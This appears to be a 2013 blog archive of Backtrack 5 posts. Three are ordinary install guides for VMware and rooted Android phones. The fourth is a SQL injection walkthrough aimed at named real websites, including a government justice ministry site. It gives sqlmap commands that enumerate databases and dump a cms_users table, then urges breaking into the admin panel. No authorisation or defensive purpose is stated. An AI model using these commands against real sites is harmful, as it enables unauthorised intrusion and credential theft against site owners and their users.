Showing posts with label Backtrack 5. Show all posts
Showing posts with label Backtrack 5. Show all posts

Thursday, October 17, 2013

How to Install backtrack through VMware or VMplayer Step by Step

BY Unknown IN , No comments


Step 1:

Requirements:
1 : Download backtrack ISO from here
2 :  Download VMware Workstation or  VMplayer
3 : Install any of above

Step 2:

Installation:

1 : Create A new virtual machine
Installing backtrack 5 R3 in virtual machine step by step  [ how to ]
Installing backtrack 5 R3 in virtual machine step by step  [ how to ]
2 : choose installer ISO ( choose backtrack 5 ISO ) 
3 : choose Linux as your guest operating system type and Ubuntu as version
Installing backtrack 5 R3
4 : give a name and location of your backtrack VM
Installing backtrack 5 R3
5 : Specify virtual hard drive space ( 20 GB is good enough )
Installing backtrack 5 R3
then click finish from ready to create vm window
Installing backtrack 5 R3
hit enter to go boot screen then choose default boot text mode and hit enter
Installing backtrack 5 R3
HIT ENTER AT THIS POINT
Installing backtrack 5 R3
type startx to start GUI ( x server )
click on Install backtrack icon or open terminal type sh -c �ubiquity� 
Installing backtrack 5 R3
and continue like normal installation choose keyboard type and provide location info
if you are installing just backtrack then go normally and erase and use entire disk
or if you installing backtrack with other OS then specify partition accordingly ( in this tutorial m using virtual hard-drive )
Installing backtrack 5 R3
click on forward and click on install
Installing backtrack 5 R3
wait until it finish installing
it will take up-to 30 minutes depend on your system
Installing backtrack 5 R3

How to Install Backtrack on Android Device - Much Easier Way

BY Unknown IN , , No comments


How to Install Backtrack on Android Device - Much Easier Way
Today I am here to tell you the Easiest way to install backtrack on an android device
For this you need:

Rooted android device
Linux installer (Can be found on Google play)
Zarchiver (Can be found on Google play)
Busybox (Can be found on Google play)
Android-VNC (Can be found on Google play)
Terminal  Emulator (Can be found on Google play)
Programmes Mentioned above are Free so dont take tension to Pay :)


Lets Start:

First you need to install busybox from Google Play
Screenshot:

Install and then Open it , it will install some more things.

Now
install Linux Installer from Google Play

Screenshot:


Open linux installer , then click on install guide from the list on your left hand site

Screenshot:


When you click that, you'll see a list of Linux distros, click on Backtrack and you will see a screen with steps on how to install it. Now click on the second page of those steps, you will get a page that looks like this:


Now click on download Image and Let it Finish Downloading

Now open Google Play
Install Terminal Emulator:
Screenshot:


Once you Done again open the store
Now install Zarchiver:
Screenshot:


When it finishes downloading, open Zarchiver, and look for the zip file that you downloaded and extract the image into a root folder called backtrack
Note:
Extract image into an external Memory Card not in the Internal one


Now open Linux Installer Again and Click on launch

you will see screen like this one:


If it didn't recognize any distro, click on Setting > Edit then change the file path there to your backtrack image, the .img file that you extracted. When it finally say "backtrack" on the drop down list, click "Start Linux"
Terminal Emulator will open, you just have to proceed with the installation steps, ask you for a new password, and some preferences. When it's done you will get a red "root@localhost~#" like the picture below:


Now you are in Backtrack

.....

If you want backtrack in GUI. Open Google Play , And Install Android VNC
Screenshot:


Once it finished Installing Open it and it will looks like this
Screenshot:

Set to the same settings in the picture. But not the ip address you have to put your ip address. You can get your own IP by Opening backtrack terminal emulator. and running "ifconfig" command: as below in screenshot
Screenshot:

Setting for VNC are:

Username: Backtrack
Password:Backtrack
IP: from "ifconfig" command or just put 127.0.0.1
Color Format: 24-Bit

Now Click connect and You Are Done :) You will be on Backtrack Desktop with in notime
Screenshot:


When finish using it don't forget to disconnect VNC and Exit Backtrack Terminal Emulator. it will take you battery in background if you left if turn on

Note:
You can install Ubuntu by Same Method

Thanks For Visiting us Give your Comments about the Tutorial

Wednesday, October 16, 2013

How to install Backtrack 5 R3 on VMware Workstation [ Complete Guide ]

BY Unknown IN , No comments





How to install Backtrack 5 R3 on VMware Workstation [ Complete Guide ]

Today i will show you how to install Backtrack 5 R3 on VMware Workstation 
then install VM tools and Ubuntu software center on backtrack

1-Download Backtrack 5 R3 form here 

2-Download VMware Workstation v8 from here

3-enjoy !!

Tuesday, October 15, 2013

HOW TO HACK ALMOST EVERYSITES WITH BACK TRACK

BY Unknown IN , , No comments


Start

- - - - - - - - - -

First of all you must to find some vuln sites...

Our target is : http://www.zwcad.org/

vuln : http://www.zwcad.org/download_form.php?id=107

to se if it is vuln try to add ' on url, like this :

http://www.zwcad.org/download_form.php?id=107'

- - - - - - - - - - - - - - - - - - - - - - - - - -

now when we have some vuln sites we can open a sqlmap...

Start>Backtrack>Exploitation Tools>Web Exploitation Tools>sqlmap

This is on a BackTrack 5...

- - - - - - - - - - - - - - - - - - - - - - - - - - - -

Now we must type some commands..

python sqlmap.py -u http://www.justice.gov.al/index.php?gj=gj1 --dbs

It looks like this :
http://www.dodaj.rs/f/3h/Ol/2VNj3k6R/step1.jpg

when we hit the ENTER the scan is started and when scan is over we will get database's

LOOK LIKE THIS- http://www.dodaj.rs/f/1T/10G/4I87LTyn/wewillgotesomething.jpg


Then we must put another commands to start searching a tables..
that command is :

python sqlmap.py -u http://www.justice.gov.al/index.php?gj=gj1 -D justice2011DB --tables


When you hit the enter the tables seraching is started and when it's over we get this info
PICTURE HERE- http://www.dodaj.rs/f/3/O2/1tsCrIS3/tablessearching.jpg

Now we must type a third command for searching columns, but dirst we must to chose a one table to get columns. I chose a cms_users table..

python sqlmap.py -u http://www.justice.gov.al/index.php?gj=gj1 -D justice2011DB -T cms_users --dump

And you will get this :
PICTURE HERE- http://www.dodaj.rs/f/12/1I/2Cv7DPis/end.jpg

You can to this too : Step by step..
To type a command for coloumns :

python sqlmap.py -u http://www.justice.gov.al/index.php?gj=gj1 -D justice2011DB -T cms_users -C herethecolumnname --dump

With this command we will get a info about one column..
Like this : http://www.dodaj.rs/f/38/Bc/2h9WLcuY/columnss.jpg

Ypu always can find your files fump in : /pentest/web/scanners/sqlmap/output/

Now when we get the all info, we only must to find a admin panel and to log in and FUCK THEM !!!